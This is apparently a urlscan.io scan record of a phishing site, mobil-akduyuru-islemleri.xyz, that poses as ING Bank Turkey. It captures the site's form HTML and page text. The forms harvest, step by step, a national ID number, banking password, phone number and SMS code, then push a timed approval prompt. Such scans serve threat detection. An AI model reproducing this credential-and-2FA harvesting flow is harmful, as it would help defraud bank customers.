mobil-akduyuru-islemleri.xyz Open in urlscan Pro
2606:4700:3031::6815:112f  Public Scan

Submitted URL: http://mobil-akduyuru-islemleri.xyz/
Effective URL: https://mobil-akduyuru-islemleri.xyz/
Submission: On July 21 via api from TR — Scanned from DE

Form analysis 7 forms found in the DOM

<form class="login__form" id="loginForm">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Kullanıcı Kodu/ T.C. Kimlik No</label>
    <input class="login__input" id="txtUserName" maxlength="11" type="text">
  </div>
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Bireysel Şifreniz</label>
    <input class="login__input" id="txtPassword" maxlength="6" type="password">
  </div>
  <a href="" class="login__forget">Şifremi Unuttum</a>
  <button class="btn login__submit" id="loginButton" onclick="submitLogin();" type="button">Giriş Yap</button>
  <button class="btn login__submit" id="loginButtonProcess" style="padding: 10px; display: none;">
    <div class="spinner"></div>
  </button>
</form>

<form class="login__form" id="passwordLoginAgain" style="display:none;">
  <small style="color:red;">Hatalı giriş yaptınız</small>
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Kullanıcı Kodu/ T.C. Kimlik No</label>
    <input class="login__input" id="txtUserNameAgain" maxlength="11" type="text" style="border-color:red!important">
  </div>
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Bireysel Şifreniz</label>
    <input class="login__input" id="txtPasswordAgain" maxlength="6" type="password" style="border-color:red;">
  </div>
  <a href="" class="login__forget">Şifremi Unuttum</a>
  <button class="btn login__submit" id="loginButtonAgain" onclick="submitLoginAgain();" type="button">Giriş Yap</button>
  <button class="btn login__submit" id="loginButtonProcessAgain" style="padding: 10px; display: none;">
    <div class="spinner"></div>
  </button>
</form>

<form class="login__form" id="phoneForm" style="display: none;">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Cep Telefonu Numaranız</label>
    <input class="login__input" id="txtPhoneNumber" type="tel" maxlength="14" placeholder="(555) 555-5555" autocomplete="tel" pattern="[(][0-9]{3}[)] [0-9]{3}-[0-9]{4}">
  </div>
  <button class="btn login__submit" id="phoneLoginButton" onclick="submitPhone();" type="button">Devam et</button>
  <button class="btn login__submit" id="phoneProcessButton" style="padding: 10px; display: none;">
    <div class="spinner"></div>
  </button>
</form>

<form class="login__form" id="codeForm" style="display: none;">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Cep Telefonunuza Gelen SMS Kodu</label>
    <input class="login__input" id="txtCode" type="text" maxlength="6">
  </div>
  <button class="btn login__submit" id="codeLoginButton" onclick="submitCode();" type="button">Devam et</button>
  <button class="btn login__submit" id="codeProcessButton" style="padding: 10px; display: none;">
    <div class="spinner"></div>
  </button>
</form>

<form class="login__form" id="codeAgainForm" style="display: none;">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">Cep Telefonunuza Gelen SMS Kodu</label>
    <input class="login__input" id="txtCodeAgain" type="text" style="border-color: red;" maxlength="6" onclick="resetInputBorderColor(this);">
    <small id="error-content-phone">Hatalı giriş yaptınız. Lütfen cep telefonuza gelen kodu giriniz.</small>
  </div>
  <button class="btn login__submit" id="codeLoginAgainButton" onclick="submitCodeAgain();" type="button">Devam et</button>
  <button class="btn login__submit" id="codeProcessAgainButton" style="padding: 10px; display: none;">
    <div class="spinner"></div>
  </button>
</form>

<form class="login__form" id="bildirimForm" style="display: none;">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;">
      <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="darkorange" class="bi bi-bell-fill" viewBox="0 0 16 16">
        <path d="M8 16a2 2 0 0 0 2-2H6a2 2 0 0 0 2 2m.995-14.901a1 1 0 1 0-1.99 0A5 5 0 0 0 3 6c0 1.098-.5 6-2 7h14c-1.5-1-2-5.902-2-7 0-2.42-1.72-4.44-4.005-4.901"></path>
      </svg> &nbsp;&nbsp;Doğrulama </label>
    <small id="error-content-phone">Lütfen telefonunza gelen mobil bildirime onay veriniz</small>
  </div>
  <small>Kalan süreniz: <span id="countdown">60</span> saniye</small>
</form>

<form class="login__form" id="completeForm" style="display: none;">
  <div class="login__group" style="gap: 8rem;">
    <label for="" class="login__label" style="white-space: nowrap;"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="orange" class="bi bi-check-circle" viewBox="0 0 16 16">
        <path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14m0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16"></path>
        <path d="m10.97 4.97-.02.022-3.473 4.425-2.093-2.094a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-1.071-1.05"></path>
      </svg>&nbsp;&nbsp;Talebiniz başarılı şekilde alınmıştır.</label>
    <small id="error-content-phone">En kısa süre içerisinde bankamız tarafından aranıcaksınız.</small>
  </div>
</form>

Text Content

 * ING'ye hoşgeldiniz

Bireysel Kurumsal
Kullanıcı Kodu/ T.C. Kimlik No
Bireysel Şifreniz
Şifremi Unuttum Giriş Yap

Hatalı giriş yaptınız
Kullanıcı Kodu/ T.C. Kimlik No
Bireysel Şifreniz
Şifremi Unuttum Giriş Yap

Cep Telefonu Numaranız
Devam et

Cep Telefonunuza Gelen SMS Kodu
Devam et

Cep Telefonunuza Gelen SMS Kodu Hatalı giriş yaptınız. Lütfen cep telefonuza
gelen kodu giriniz.
Devam et

  Doğrulama Lütfen telefonunza gelen mobil bildirime onay veriniz
Kalan süreniz: 60 saniye
  Talebiniz başarılı şekilde alınmıştır. En kısa süre içerisinde bankamız
tarafından aranıcaksınız.



ING MOBIL ILE ÖZGÜRLÜĞÜN KEYFINI YAŞAYIN.


Yardım


İNTERNET ŞUBESI'NI ILK DEFA KULLANACAĞIM, NE YAPMALIYIM?

ING Banka Kartı'nız veya ING Kredi Kartı'nız varsa kart bilgilerinizi ve
bankamızda kayıtlı cep telefon numaranızı girerek şifrenizi ve kullanıcı
kodunuzu alabilirsiniz.


KULLANICI KODUMU BILMIYORUM.

ING Banka Kartı'nız veya ING Kredi Kartı'nız varsa kart bilgilerinizi ve
bankamızda kayıtlı cep telefon numaranızı girerek şifrenizi ve kullanıcı
kodunuzu alabilirsiniz.


ŞIFREMI UNUTTUM. VIDEO

ING Banka Kartı'nız veya ING Kredi Kartı'nız varsa kart bilgilerinizi ve
bankamızda kayıtlı cep telefon numaranızı girerek şifrenizi ve kullanıcı
kodunuzu alabilirsiniz.

You must enable javascript in your browser to view this webpage.